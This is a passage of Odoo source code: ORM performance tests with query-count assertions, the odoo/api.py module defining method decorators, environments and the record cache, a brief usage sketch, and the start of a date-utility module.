records = self.env['test_performance.base'].search([])
self.assertEqual(len(records), 5)
with self.assertQueryCount(__system__=1, demo=1):
records.write({'name': 'X'})
@users('__system__', 'demo')
@warmup
def test_write_base_with_recomputation(self):
""" Write records (with recomputation). """
records = self.env['test_performance.base'].search([])
self.assertEqual(len(records), 5)
with self.assertQueryCount(__system__=3, demo=3):
records.write({'value': 42})
@users('__system__', 'demo')
@warmup
def test_create_base(self):
""" Create records. """
with self.assertQueryCount(__system__=6, demo=6):
self.env['test_performance.base'].create({'name': 'X'})
@users('__system__', 'demo')
@warmup
def test_create_base_with_lines(self):
""" Create records with one2many lines. """
with self.assertQueryCount(__system__=20, demo=20):
self.env['test_performance.base'].create({
'name': 'X',
'line_ids': [(0, 0, {'value': val}) for val in range(10)],
})
@users('__system__', 'demo')
@warmup
def test_create_base_with_tags(self):
""" Create records with many2many tags. """
with self.assertQueryCount(__system__=17, demo=17):
self.env['test_performance.base'].create({
'name': 'X',
'tag_ids': [(0, 0, {'name': val}) for val in range(10)],
})
@users('__system__', 'demo')
@warmup
def test_several_prefetch(self):
initial_records = self.env['test_performance.base'].search([])
self.assertEqual(len(initial_records), 5)
for _i in range(8):
self.env.cr.execute(
'insert into test_performance_base(value) select value from test_performance_base'
)
records = self.env['test_performance.base'].search([])
self.assertEqual(len(records), 1280)
# should only cause 2 queries thanks to prefetching
with self.assertQueryCount(__system__=2, demo=2):
records.mapped('value')
records.invalidate_cache(['value'])
with self.assertQueryCount(__system__=2, demo=2):
with self.env.do_in_onchange():
records.mapped('value')
self.env.cr.execute(
'delete from test_performance_base where id not in %s',
(tuple(initial_records.ids),)
)
def expected_read_group(self):
groups = defaultdict(list)
for record in self.env['test_performance.base'].search([]):
groups[record.partner_id.id].append(record.value)
partners = self.env['res.partner'].search([('id', 'in', list(groups))])
return [{
'__domain': [('partner_id', '=', partner.id)],
'partner_id': (partner.id, partner.display_name),
'partner_id_count': len(groups[partner.id]),
'value': sum(groups[partner.id]),
} for partner in partners]
@users('__system__', 'demo')
def test_read_group_with_name_get(self):
model = self.env['test_performance.base']
expected = self.expected_read_group()
# use read_group and check the expected result
with self.assertQueryCount(__system__=2, demo=2):
model.invalidate_cache()
result = model.read_group([], ['partner_id', 'value'], ['partner_id'])
self.assertEqual(result, expected)
@users('__system__', 'demo')
def test_read_group_without_name_get(self):
model = self.env['test_performance.base']
expected = self.expected_read_group()
# use read_group and check the expected result
with self.assertQueryCount(__system__=1, demo=1):
model.invalidate_cache()
result = model.read_group([], ['partner_id', 'value'], ['partner_id'])
self.assertEqual(len(result), len(expected))
for res, exp in pycompat.izip(result, expected):
self.assertEqual(res['__domain'], exp['__domain'])
self.assertEqual(res['partner_id'][0], exp['partner_id'][0])
self.assertEqual(res['partner_id_count'], exp['partner_id_count'])
self.assertEqual(res['value'], exp['value'])
# now serialize to json, which should force evaluation
with self.assertQueryCount(__system__=1, demo=1):
json.dumps(result)
```
#### File: odoo/odoo/api.py
```python
__all__ = [
'Environment',
'Meta', 'guess', 'noguess',
'model', 'multi', 'one',
'model_cr', 'model_cr_context',
'cr', 'cr_context',
'cr_uid', 'cr_uid_context',
'cr_uid_id', 'cr_uid_id_context',
'cr_uid_ids', 'cr_uid_ids_context',
'cr_uid_records', 'cr_uid_records_context',
'constrains', 'depends', 'onchange', 'returns',
'call_kw',
]
import logging
from collections import defaultdict, Mapping
from contextlib import contextmanager
from inspect import currentframe, getargspec
from pprint import pformat
from weakref import WeakSet
from decorator import decorate, decorator
from werkzeug.local import Local, release_local
from odoo.tools import frozendict, classproperty, StackMap, pycompat
from odoo.exceptions import CacheMiss
_logger = logging.getLogger(__name__)
# The following attributes are used, and reflected on wrapping methods:
# - method._constrains: set by @constrains, specifies constraint dependencies
# - method._depends: set by @depends, specifies compute dependencies
# - method._returns: set by @returns, specifies return model
# - method._onchange: set by @onchange, specifies onchange fields
# - method.clear_cache: set by @ormcache, used to clear the cache
#
# On wrapping method only:
# - method._api: decorator function, used for re-applying decorator
# - method._orig: original method
#
WRAPPED_ATTRS = ('__module__', '__name__', '__doc__', '_constrains',
'_depends', '_onchange', '_returns', 'clear_cache')
INHERITED_ATTRS = ('_returns',)
class Params(object):
def __init__(self, args, kwargs):
self.args = args
self.kwargs = kwargs
def __str__(self):
params = []
for arg in self.args:
params.append(repr(arg))
for item in sorted(self.kwargs.items()):
params.append("%s=%r" % item)
return ', '.join(params)
class Meta(type):
""" Metaclass that automatically decorates traditional-style methods by
guessing their API. It also implements the inheritance of the
:func:`returns` decorators.
"""
def __new__(meta, name, bases, attrs):
# dummy parent class to catch overridden methods decorated with 'returns'
parent = type.__new__(meta, name, bases, {})
for key, value in list(attrs.items()):
if not key.startswith('__') and callable(value):
# make the method inherit from decorators
value = propagate(getattr(parent, key, None), value)
# guess calling convention if none is given
if not hasattr(value, '_api'):
try:
value = guess(value)
except TypeError:
pass
if (getattr(value, '_api', None) or '').startswith('cr'):
_logger.warning("Deprecated method %s.%s in module %s", name, key, attrs.get('__module__'))
attrs[key] = value
return type.__new__(meta, name, bases, attrs)
def attrsetter(attr, value):
""" Return a function that sets ``attr`` on its argument and returns it. """
return lambda method: setattr(method, attr, value) or method
def propagate(method1, method2):
""" Propagate decorators from ``method1`` to ``method2``, and return the
resulting method.
"""
if method1:
for attr in INHERITED_ATTRS:
if hasattr(method1, attr) and not hasattr(method2, attr):
setattr(method2, attr, getattr(method1, attr))
return method2
def constrains(*args):
""" Decorates a constraint checker. Each argument must be a field name
used in the check::
@api.one
@api.constrains('name', 'description')
def _check_description(self):
if self.name == self.description:
raise ValidationError("Fields name and description must be different")
Invoked on the records on which one of the named fields has been modified.
Should raise :class:`~odoo.exceptions.ValidationError` if the
validation failed.
.. warning::
``@constrains`` only supports simple field names, dotted names
(fields of relational fields e.g. ``partner_id.customer``) are not
supported and will be ignored
``@constrains`` will be triggered only if the declared fields in the
decorated method are included in the ``create`` or ``write`` call.
It implies that fields not present in a view will not trigger a call
during record creation. An override of ``create`` is necessary to make
sure a constraint will always be triggered (e.g. to test the absence of
value).
"""
return attrsetter('_constrains', args)
def onchange(*args):
""" Return a decorator to decorate an onchange method for given fields.
Each argument must be a field name::
@api.onchange('partner_id')
def _onchange_partner(self):
self.message = "Dear %s" % (self.partner_id.name or "")
In the form views where the field appears, the method will be called
when one of the given fields is modified. The method is invoked on a
pseudo-record that contains the values present in the form. Field
assignments on that record are automatically sent back to the client.
The method may return a dictionary for changing field domains and pop up
a warning message, like in the old API::
return {
'domain': {'other_id': [('partner_id', '=', partner_id)]},
'warning': {'title': "Warning", 'message': "What is this?"},
}
.. danger::
Since ``@onchange`` returns a recordset of pseudo-records,
calling any one of the CRUD methods
(:meth:`create`, :meth:`read`, :meth:`write`, :meth:`unlink`)
on the aforementioned recordset is undefined behaviour,
as they potentially do not exist in the database yet.
Instead, simply set the record's field like shown in the example
above or call the :meth:`update` method.
.. warning::
``@onchange`` only supports simple field names, dotted names
(fields of relational fields e.g. ``partner_id.tz``) are not
supported and will be ignored
"""
return attrsetter('_onchange', args)
def depends(*args):
""" Return a decorator that specifies the field dependencies of a "compute"
method (for new-style function fields). Each argument must be a string
that consists in a dot-separated sequence of field names::
pname = fields.Char(compute='_compute_pname')
@api.one
@api.depends('partner_id.name', 'partner_id.is_company')
def _compute_pname(self):
if self.partner_id.is_company:
self.pname = (self.partner_id.name or "").upper()
else:
self.pname = self.partner_id.name
One may also pass a single function as argument. In that case, the
dependencies are given by calling the function with the field's model.
"""
if args and callable(args[0]):
args = args[0]
elif any('id' in arg.split('.') for arg in args):
raise NotImplementedError("Compute method cannot depend on field 'id'.")
return attrsetter('_depends', args)
def returns(model, downgrade=None, upgrade=None):
""" Return a decorator for methods that return instances of ``model``.
:param model: a model name, or ``'self'`` for the current model
:param downgrade: a function ``downgrade(self, value, *args, **kwargs)``
to convert the record-style ``value`` to a traditional-style output
:param upgrade: a function ``upgrade(self, value, *args, **kwargs)``
to convert the traditional-style ``value`` to a record-style output
The arguments ``self``, ``*args`` and ``**kwargs`` are the ones passed
to the method in the record-style.
The decorator adapts the method output to the api style: ``id``, ``ids`` or
``False`` for the traditional style, and recordset for the record style::
@model
@returns('res.partner')
def find_partner(self, arg):
... # return some record
# output depends on call style: traditional vs record style
partner_id = model.find_partner(cr, uid, arg, context=context)
# recs = model.browse(cr, uid, ids, context)
partner_record = recs.find_partner(arg)
Note that the decorated method must satisfy that convention.
Those decorators are automatically *inherited*: a method that overrides
a decorated existing method will be decorated with the same
``@returns(model)``.
"""
return attrsetter('_returns', (model, downgrade, upgrade))
def downgrade(method, value, self, args, kwargs):
""" Convert ``value`` returned by ``method`` on ``self`` to traditional style. """
spec = getattr(method, '_returns', None)
if not spec:
return value
_, convert, _ = spec
if convert and len(getargspec(convert).args) > 1:
return convert(self, value, *args, **kwargs)
elif convert:
return convert(value)
else:
return value.ids
def aggregate(method, value, self):
""" Aggregate record-style ``value`` for a method decorated with ``@one``. """
spec = getattr(method, '_returns', None)
if spec:
# value is a list of instances, concatenate them
model, _, _ = spec
if model == 'self':
return sum(value, self.browse())
elif model:
return sum(value, self.env[model])
return value
def split_context(method, args, kwargs):
""" Extract the context from a pair of positional and keyword arguments.
Return a triple ``context, args, kwargs``.
"""
pos = len(getargspec(method).args) - 1
if pos < len(args):
return args[pos], args[:pos], kwargs
else:
return kwargs.pop('context', None), args, kwargs
def model(method):
""" Decorate a record-style method where ``self`` is a recordset, but its
contents are not relevant, only the model is. Such a method::
@api.model
def method(self, args):
...
may be called in both record and traditional styles, like::
# recs = model.browse(cr, uid, ids, context)
recs.method(args)
model.method(cr, uid, args, context=context)
Notice that no ``ids`` are passed to the method in the traditional style.
"""
if method.__name__ == 'create':
return model_create_single(method)
method._api = 'model'
return method
def multi(method):
""" Decorate a record-style method where ``self`` is a recordset. The method
typically defines an operation on records. Such a method::
@api.multi
def method(self, args):
...
may be called in both record and traditional styles, like::
# recs = model.browse(cr, uid, ids, context)
recs.method(args)
model.method(cr, uid, ids, args, context=context)
"""
method._api = 'multi'
return method
def one(method):
""" Decorate a record-style method where ``self`` is expected to be a
singleton instance. The decorated method automatically loops on records,
and makes a list with the results. In case the method is decorated with
:func:`returns`, it concatenates the resulting instances. Such a
method::
@api.one
def method(self, args):
return self.name
may be called in both record and traditional styles, like::
# recs = model.browse(cr, uid, ids, context)
names = recs.method(args)
names = model.method(cr, uid, ids, args, context=context)
.. deprecated:: 9.0
:func:`~.one` often makes the code less clear and behaves in ways
developers and readers may not expect.
It is strongly recommended to use :func:`~.multi` and either
iterate on the ``self`` recordset or ensure that the recordset
is a single record with :meth:`~odoo.models.Model.ensure_one`.
"""
def loop(method, self, *args, **kwargs):
result = [method(rec, *args, **kwargs) for rec in self]
return aggregate(method, result, self)
wrapper = decorator(loop, method)
wrapper._api = 'one'
return wrapper
def model_cr(method):
""" Decorate a record-style method where ``self`` is a recordset, but its
contents are not relevant, only the model is. Such a method::
@api.model_cr
def method(self, args):
...
may be called in both record and traditional styles, like::
# recs = model.browse(cr, uid, ids, context)
recs.method(args)
model.method(cr, args)
Notice that no ``uid``, ``ids``, ``context`` are passed to the method in
the traditional style.
"""
method._api = 'model_cr'
return method
def model_cr_context(method):
""" Decorate a record-style method where ``self`` is a recordset, but its
contents are not relevant, only the model is. Such a method::
@api.model_cr_context
def method(self, args):
...
may be called in both record and traditional styles, like::
# recs = model.browse(cr, uid, ids, context)
recs.method(args)
model.method(cr, args, context=context)
Notice that no ``uid``, ``ids`` are passed to the method in the
traditional style.
"""
method._api = 'model_cr_context'
return method
_create_logger = logging.getLogger(__name__ + '.create')
def _model_create_single(create, self, arg):
# 'create' expects a dict and returns a record
if isinstance(arg, Mapping):
return create(self, arg)
if len(arg) > 1:
_create_logger.debug("%s.create() called with %d dicts", self, len(arg))
return self.browse().concat(*(create(self, vals) for vals in arg))
def model_create_single(method):
""" Decorate a method that takes a dictionary and creates a single record.
The method may be called with either a single dict or a list of dicts::
record = model.create(vals)
records = model.create([vals, ...])
"""
wrapper = decorate(method, _model_create_single)
wrapper._api = 'model_create'
return wrapper
def _model_create_multi(create, self, arg):
# 'create' expects a list of dicts and returns a recordset
if isinstance(arg, Mapping):
return create(self, [arg])
return create(self, arg)
def model_create_multi(method):
""" Decorate a method that takes a list of dictionaries and creates multiple
records. The method may be called with either a single dict or a list of
dicts::
record = model.create(vals)
records = model.create([vals, ...])
"""
wrapper = decorate(method, _model_create_multi)
wrapper._api = 'model_create'
return wrapper
def cr(method):
""" Decorate a traditional-style method that takes ``cr`` as a parameter.
Such a method may be called in both record and traditional styles, like::
# recs = model.browse(cr, uid, ids, context)
recs.method(args)
model.method(cr, args)
"""
method._api = 'cr'
return method
def cr_context(method):
""" Decorate a traditional-style method that takes ``cr``, ``context`` as parameters. """
method._api = 'cr_context'
return method
def cr_uid(method):
""" Decorate a traditional-style method that takes ``cr``, ``uid`` as parameters. """
method._api = 'cr_uid'
return method
def cr_uid_context(method):
""" Decorate a traditional-style method that takes ``cr``, ``uid``, ``context`` as
parameters. Such a method may be called in both record and traditional
styles, like::
# recs = model.browse(cr, uid, ids, context)
recs.method(args)
model.method(cr, uid, args, context=context)
"""
method._api = 'cr_uid_context'
return method
def cr_uid_id(method):
""" Decorate a traditional-style method that takes ``cr``, ``uid``, ``id`` as
parameters. Such a method may be called in both record and traditional
styles. In the record style, the method automatically loops on records.
"""
method._api = 'cr_uid_id'
return method
def cr_uid_id_context(method):
""" Decorate a traditional-style method that takes ``cr``, ``uid``, ``id``,
``context`` as parameters. Such a method::
@api.cr_uid_id
def method(self, cr, uid, id, args, context=None):
...
may be called in both record and traditional styles, like::
# rec = model.browse(cr, uid, id, context)
rec.method(args)
model.method(cr, uid, id, args, context=context)
"""
method._api = 'cr_uid_id_context'
return method
def cr_uid_ids(method):
""" Decorate a traditional-style method that takes ``cr``, ``uid``, ``ids`` as
parameters. Such a method may be called in both record and traditional
styles.
"""
method._api = 'cr_uid_ids'
return method
def cr_uid_ids_context(method):
""" Decorate a traditional-style method that takes ``cr``, ``uid``, ``ids``,
``context`` as parameters. Such a method::
@api.cr_uid_ids_context
def method(self, cr, uid, ids, args, context=None):
...
may be called in both record and traditional styles, like::
# recs = model.browse(cr, uid, ids, context)
recs.method(args)
model.method(cr, uid, ids, args, context=context)
It is generally not necessary, see :func:`guess`.
"""
method._api = 'cr_uid_ids_context'
return method
def cr_uid_records(method):
""" Decorate a traditional-style method that takes ``cr``, ``uid``, a
recordset of model ``self`` as parameters. Such a method::
@api.cr_uid_records
def method(self, cr, uid, records, args):
...
may be called in both record and traditional styles, like::
# records = model.browse(cr, uid, ids, context)
records.method(args)
model.method(cr, uid, records, args)
"""
method._api = 'cr_uid_records'
return method
def cr_uid_records_context(method):
""" Decorate a traditional-style method that takes ``cr``, ``uid``, a
recordset of model ``self``, ``context`` as parameters. Such a method::
@api.cr_uid_records_context
def method(self, cr, uid, records, args, context=None):
...
may be called in both record and traditional styles, like::
# records = model.browse(cr, uid, ids, context)
records.method(args)
model.method(cr, uid, records, args, context=context)
"""
method._api = 'cr_uid_records_context'
return method
def v7(method_v7):
""" Decorate a method that supports the old-style api only. A new-style api
may be provided by redefining a method with the same name and decorated
with :func:`~.v8`::
@api.v7
def foo(self, cr, uid, ids, context=None):
...
@api.v8
def foo(self):
...
Special care must be taken if one method calls the other one, because
the method may be overridden! In that case, one should call the method
from the current class (say ``MyClass``), for instance::
@api.v7
def foo(self, cr, uid, ids, context=None):
# Beware: records.foo() may call an overriding of foo()
records = self.browse(cr, uid, ids, context)
return MyClass.foo(records)
Note that the wrapper method uses the docstring of the first method.
"""
# retrieve method_v8 from the caller's frame
frame = currentframe().f_back
return frame.f_locals.get(method_v7.__name__, method_v7)
def v8(method_v8):
""" Decorate a method that supports the new-style api only. An old-style api
may be provided by redefining a method with the same name and decorated
with :func:`~.v7`::
@api.v8
def foo(self):
...
@api.v7
def foo(self, cr, uid, ids, context=None):
...
Note that the wrapper method uses the docstring of the first method.
"""
if method_v8.__name__ == 'read':
return multi(method_v8)
method_v8._api = 'v8'
return method_v8
def noguess(method):
""" Decorate a method to prevent any effect from :func:`guess`. """
method._api = None
return method
def guess(method):
""" Decorate ``method`` to make it callable in both traditional and record
styles. This decorator is applied automatically by the model's
metaclass, and has no effect on already-decorated methods.
The API style is determined by heuristics on the parameter names: ``cr``
or ``cursor`` for the cursor, ``uid`` or ``user`` for the user id,
``id`` or ``ids`` for a list of record ids, and ``context`` for the
context dictionary. If a traditional API is recognized, one of the
decorators :func:`cr`, :func:`cr_context`, :func:`cr_uid`,
:func:`cr_uid_context`, :func:`cr_uid_id`, :func:`cr_uid_id_context`,
:func:`cr_uid_ids`, :func:`cr_uid_ids_context` is applied on the method.
Method calls are considered traditional style when their first parameter
is a database cursor.
"""
if hasattr(method, '_api'):
return method
# introspection on argument names to determine api style
args, vname, kwname, defaults = getargspec(method)
names = tuple(args) + (None,) * 4
if names[0] == 'self':
if names[1] in ('cr', 'cursor'):
if names[2] in ('uid', 'user'):
if names[3] == 'ids':
if 'context' in names or kwname:
return cr_uid_ids_context(method)
else:
return cr_uid_ids(method)
elif names[3] == 'id' or names[3] == 'res_id':
if 'context' in names or kwname:
return cr_uid_id_context(method)
else:
return cr_uid_id(method)
elif 'context' in names or kwname:
return cr_uid_context(method)
else:
return cr_uid(method)
elif 'context' in names:
return cr_context(method)
else:
return cr(method)
# no wrapping by default
return noguess(method)
def expected(decorator, func):
""" Decorate ``func`` with ``decorator`` if ``func`` is not wrapped yet. """
return decorator(func) if not hasattr(func, '_api') else func
def _call_kw_model(method, self, args, kwargs):
context, args, kwargs = split_context(method, args, kwargs)
recs = self.with_context(context or {})
_logger.debug("call %s.%s(%s)", recs, method.__name__, Params(args, kwargs))
result = method(recs, *args, **kwargs)
return downgrade(method, result, recs, args, kwargs)
def _call_kw_model_create(method, self, args, kwargs):
# special case for method 'create'
context, args, kwargs = split_context(method, args, kwargs)
recs = self.with_context(context or {})
_logger.debug("call %s.%s(%s)", recs, method.__name__, Params(args, kwargs))
result = method(recs, *args, **kwargs)
return result.id if isinstance(args[0], Mapping) else result.ids
def _call_kw_multi(method, self, args, kwargs):
ids, args = args[0], args[1:]
context, args, kwargs = split_context(method, args, kwargs)
recs = self.with_context(context or {}).browse(ids)
_logger.debug("call %s.%s(%s)", recs, method.__name__, Params(args, kwargs))
result = method(recs, *args, **kwargs)
return downgrade(method, result, recs, args, kwargs)
def call_kw(model, name, args, kwargs):
""" Invoke the given method ``name`` on the recordset ``model``. """
method = getattr(type(model), name)
api = getattr(method, '_api', None)
if api == 'model':
return _call_kw_model(method, model, args, kwargs)
elif api == 'model_create':
return _call_kw_model_create(method, model, args, kwargs)
else:
return _call_kw_multi(method, model, args, kwargs)
class Environment(Mapping):
""" An environment wraps data for ORM records:
- :attr:`cr`, the current database cursor;
- :attr:`uid`, the current user id;
- :attr:`context`, the current context dictionary.
It provides access to the registry by implementing a mapping from model
names to new api models. It also holds a cache for records, and a data
structure to manage recomputations.
"""
_local = Local()
@classproperty
def envs(cls):
return cls._local.environments
@classmethod
@contextmanager
def manage(cls):
""" Context manager for a set of environments. """
if hasattr(cls._local, 'environments'):
yield
else:
try:
cls._local.environments = Environments()
yield
finally:
release_local(cls._local)
@classmethod
def reset(cls):
""" Clear the set of environments.
This may be useful when recreating a registry inside a transaction.
"""
cls._local.environments = Environments()
def __new__(cls, cr, uid, context):
assert context is not None
args = (cr, uid, context)
# if env already exists, return it
env, envs = None, cls.envs
for env in envs:
if env.args == args:
return env
# otherwise create environment, and add it in the set
self = object.__new__(cls)
self.cr, self.uid, self.context = self.args = (cr, uid, frozendict(context))
self.registry = Registry(cr.dbname)
self.cache = envs.cache
self._cache_key = (cr, uid)
self._protected = StackMap() # {field: ids, ...}
self.dirty = defaultdict(set) # {record: set(field_name), ...}
self.all = envs
envs.add(self)
return self
#
# Mapping methods
#
def __contains__(self, model_name):
""" Test whether the given model exists. """
return model_name in self.registry
def __getitem__(self, model_name):
""" Return an empty recordset from the given model. """
return self.registry[model_name]._browse((), self)
def __iter__(self):
""" Return an iterator on model names. """
return iter(self.registry)
def __len__(self):
""" Return the size of the model registry. """
return len(self.registry)
def __eq__(self, other):
return self is other
def __ne__(self, other):
return self is not other
def __hash__(self):
return object.__hash__(self)
def __call__(self, cr=None, user=None, context=None):
""" Return an environment based on ``self`` with modified parameters.
:param cr: optional database cursor to change the current cursor
:param user: optional user/user id to change the current user
:param context: optional context dictionary to change the current context
"""
cr = self.cr if cr is None else cr
uid = self.uid if user is None else int(user)
context = self.context if context is None else context
return Environment(cr, uid, context)
def ref(self, xml_id, raise_if_not_found=True):
""" return the record corresponding to the given ``xml_id`` """
return self['ir.model.data'].xmlid_to_object(xml_id, raise_if_not_found=raise_if_not_found)
@property
def user(self):
""" return the current user (as an instance) """
return self(user=SUPERUSER_ID)['res.users'].browse(self.uid)
@property
def lang(self):
""" return the current language code """
return self.context.get('lang')
@contextmanager
def _do_in_mode(self, mode):
if self.all.mode:
yield
else:
try:
self.all.mode = mode
yield
finally:
self.all.mode = False
self.dirty.clear()
def do_in_draft(self):
""" Context-switch to draft mode, where all field updates are done in
cache only.
"""
return self._do_in_mode(True)
@property
def in_draft(self):
""" Return whether we are in draft mode. """
return bool(self.all.mode)
def do_in_onchange(self):
""" Context-switch to 'onchange' draft mode, which is a specialized
draft mode used during execution of onchange methods.
"""
return self._do_in_mode('onchange')
@property
def in_onchange(self):
""" Return whether we are in 'onchange' draft mode. """
return self.all.mode == 'onchange'
def clear(self):
""" Clear all record caches, and discard all fields to recompute.
This may be useful when recovering from a failed ORM operation.
"""
self.cache.invalidate()
self.all.todo.clear()
@contextmanager
def clear_upon_failure(self):
""" Context manager that clears the environments (caches and fields to
recompute) upon exception.
"""
try:
yield
except Exception:
self.clear()
raise
def protected(self, field):
""" Return the recordset for which ``field`` should not be invalidated or recomputed. """
return self[field.model_name].browse(self._protected.get(field, ()))
@contextmanager
def protecting(self, what, records=None):
""" Prevent the invalidation or recomputation of fields on records.
The parameters are either:
- ``what`` a collection of fields and ``records`` a recordset, or
- ``what`` a collection of pairs ``(fields, records)``.
"""
protected = self._protected
try:
protected.pushmap()
what = what if records is None else [(what, records)]
for fields, records in what:
for field in fields:
ids = protected.get(field, frozenset())
protected[field] = ids.union(records._ids)
yield
finally:
protected.popmap()
def field_todo(self, field):
""" Return a recordset with all records to recompute for ``field``. """
ids = {rid for recs in self.all.todo.get(field, ()) for rid in recs.ids}
return self[field.model_name].browse(ids)
def check_todo(self, field, record):
""" Check whether ``field`` must be recomputed on ``record``, and if so,
return the corresponding recordset to recompute.
"""
for recs in self.all.todo.get(field, []):
if recs & record:
return recs
def add_todo(self, field, records):
""" Mark ``field`` to be recomputed on ``records``. """
recs_list = self.all.todo.setdefault(field, [])
for i, recs in enumerate(recs_list):
if recs.env == records.env:
# only add records if not already in the recordset, much much
# cheaper in case recs is big and records is a singleton
# already present
if not records <= recs:
recs_list[i] |= records
break
else:
recs_list.append(records)
def remove_todo(self, field, records):
""" Mark ``field`` as recomputed on ``records``. """
recs_list = [recs - records for recs in self.all.todo.pop(field, [])]
recs_list = [r for r in recs_list if r]
if recs_list:
self.all.todo[field] = recs_list
def has_todo(self):
""" Return whether some fields must be recomputed. """
return bool(self.all.todo)
def get_todo(self):
""" Return a pair ``(field, records)`` to recompute.
The field is such that none of its dependencies must be recomputed.
"""
field = min(self.all.todo, key=self.registry.field_sequence)
return field, self.all.todo[field][0]
@property
def recompute(self):
return self.all.recompute
@contextmanager
def norecompute(self):
tmp = self.all.recompute
self.all.recompute = False
try:
yield
finally:
self.all.recompute = tmp
def cache_key(self, field):
""" Return the key to store the value of ``field`` in cache, the full
cache key being ``(key, field, record.id)``.
"""
return self if field.context_dependent else self._cache_key
class Environments(object):
""" A common object for all environments in a request. """
def __init__(self):
self.envs = WeakSet() # weak set of environments
self.cache = Cache() # cache for all records
self.todo = {} # recomputations {field: [records]}
self.mode = False # flag for draft/onchange
self.recompute = True
def add(self, env):
""" Add the environment ``env``. """
self.envs.add(env)
def __iter__(self):
""" Iterate over environments. """
return iter(self.envs)
class Cache(object):
""" Implementation of the cache of records. """
def __init__(self):
# {key: {field: {record_id: value}}}
self._data = defaultdict(lambda: defaultdict(dict))
def contains(self, record, field):
""" Return whether ``record`` has a value for ``field``. """
key = record.env.cache_key(field)
return record.id in self._data[key].get(field, ())
def get(self, record, field):
""" Return the value of ``field`` for ``record``. """
key = record.env.cache_key(field)
try:
value = self._data[key][field][record._ids[0]]
except KeyError:
raise CacheMiss(record, field)
return value.get() if isinstance(value, SpecialValue) else value
def set(self, record, field, value):
""" Set the value of ``field`` for ``record``. """
key = record.env.cache_key(field)
self._data[key][field][record._ids[0]] = value
def update(self, records, field, values):
""" Set the values of ``field`` for several ``records``. """
key = records.env.cache_key(field)
self._data[key][field].update(pycompat.izip(records._ids, values))
def remove(self, record, field):
""" Remove the value of ``field`` for ``record``. """
key = record.env.cache_key(field)
del self._data[key][field][record.id]
def contains_value(self, record, field):
""" Return whether ``record`` has a regular value for ``field``. """
key = record.env.cache_key(field)
value = self._data[key][field].get(record.id, SpecialValue(None))
return not isinstance(value, SpecialValue)
def get_value(self, record, field, default=None):
""" Return the regular value of ``field`` for ``record``. """
key = record.env.cache_key(field)
value = self._data[key][field].get(record.id, SpecialValue(None))
return default if isinstance(value, SpecialValue) else value
def get_special(self, record, field, default=None):
""" Return the special value of ``field`` for ``record``. """
key = record.env.cache_key(field)
value = self._data[key][field].get(record.id)
return value.get if isinstance(value, SpecialValue) else default
def set_special(self, record, field, getter):
""" Set the value of ``field`` for ``record`` to return ``getter()``. """
key = record.env.cache_key(field)
self._data[key][field][record.id] = SpecialValue(getter)
def set_failed(self, records, fields, exception):
""" Mark ``fields`` on ``records`` with the given exception. """
def getter():
raise exception
for field in fields:
for record in records:
self.set_special(record, field, getter)
def get_fields(self, record):
""" Return the fields with a value for ``record``. """
for name, field in record._fields.items():
key = record.env.cache_key(field)
if name != 'id' and record.id in self._data[key].get(field, ()):
yield field
def get_records(self, model, field):
""" Return the records of ``model`` that have a value for ``field``. """
key = model.env.cache_key(field)
ids = list(self._data[key][field])
return model.browse(ids)
def get_missing_ids(self, records, field):
""" Return the ids of ``records`` that have no value for ``field``. """
key = records.env.cache_key(field)
field_cache = self._data[key][field]
for record_id in records._ids:
if record_id not in field_cache:
yield record_id
def copy(self, records, env):
""" Copy the cache of ``records`` to ``env``. """
src, dst = records.env, env
for src_key, dst_key in [(src, dst), (src._cache_key, dst._cache_key)]:
if src_key == dst_key:
break
src_cache = self._data[src_key]
dst_cache = self._data[dst_key]
for field, src_field_cache in src_cache.items():
dst_field_cache = dst_cache[field]
for record_id, value in src_field_cache.items():
if not isinstance(value, SpecialValue):
                        # But not if it's a SpecialValue, which is often an access error,
                        # because the other environment (e.g. sudo()) may well be expected to have access.
dst_field_cache[record_id] = value
def invalidate(self, spec=None):
""" Invalidate the cache, partially or totally depending on ``spec``. """
if spec is None:
self._data.clear()
elif spec:
for field, ids in spec:
if ids is None:
for data in self._data.values():
data.pop(field, None)
else:
for data in self._data.values():
field_cache = data.get(field)
if field_cache:
for id in ids:
field_cache.pop(id, None)
def check(self, env):
""" Check the consistency of the cache for the given environment. """
# make a full copy of the cache, and invalidate it
dump = defaultdict(dict)
for key in [env, env._cache_key]:
key_cache = self._data[key]
for field, field_cache in key_cache.items():
for record_id, value in field_cache.items():
if record_id:
dump[field][record_id] = value
self.invalidate()
# re-fetch the records, and compare with their former cache
invalids = []
for field, field_dump in dump.items():
records = env[field.model_name].browse(field_dump)
for record in records:
try:
cached = field_dump[record.id]
cached = cached.get() if isinstance(cached, SpecialValue) else cached
value = field.convert_to_record(cached, record)
fetched = record[field.name]
if fetched != value:
info = {'cached': value, 'fetched': fetched}
invalids.append((record, field, info))
except (AccessError, MissingError):
pass
if invalids:
raise UserError('Invalid cache for fields\n' + pformat(invalids))
class SpecialValue(object):
""" Wrapper for a function to get the cached value of a field. """
__slots__ = ['get']
def __init__(self, getter):
self.get = getter
# keep those imports here in order to handle cyclic dependencies correctly
from odoo import SUPERUSER_ID
from odoo.exceptions import UserError, AccessError, MissingError
from odoo.modules.registry import Registry
```
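A minimal sketch of the signature-guessing behaviour above, assuming an Odoo 11-era installation so that the `odoo.api` module shown in this file is importable; the function name and arguments below are made up for illustration.
```python
# Sketch only: relies on odoo.api (the module above) being importable.
from odoo import api

def write_status(self, cr, uid, ids, status, context=None):
    """Old-style signature with cr/uid/ids/context in the expected positions."""
    return status

wrapped = api.guess(write_status)
# guess() recognised (self, cr, uid, ids, ..., context) and applied
# cr_uid_ids_context, which only tags the function for later call dispatch.
assert wrapped._api == 'cr_uid_ids_context'
```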
#### File: odoo/tools/date_utils.py
```python
import math
import calendar
from datetime import date, datetime, time
import pytz
from dateutil.relativedelta import relativedelta
from . import ustr
def get_month(date):
''' Compute the month dates range on which the 'date' parameter belongs to.
:param date: A datetime.datetime or datetime.date object.
:return: A tuple (date_from, date_to) having the same object type as the 'date' parameter.
'''
date_from = type(date)(date.year, date.month, 1)
date_to = type(date)(date.year, date.month, calendar.monthrange(date.year, date.month)[1])
return date_from, date_to
def get_quarter_number(date):
''' Get the number of the quarter on which the 'date' parameter belongs to.
:param date: A datetime.datetime or datetime.date object.
:return: A [1-4] integer.
'''
return math.ceil(date.month / 3)
def get_quarter(date):
''' Compute the quarter dates range on which the 'date' parameter belongs to.
:param date: A datetime.datetime or datetime.date object.
:return: A tuple (date_from, date_to) having the same object type as the 'date' parameter.
'''
quarter_number = get_quarter_number(date)
month_from = ((quarter_number - 1) * 3) + 1
date_from = type(date)(date.year, month_from, 1)
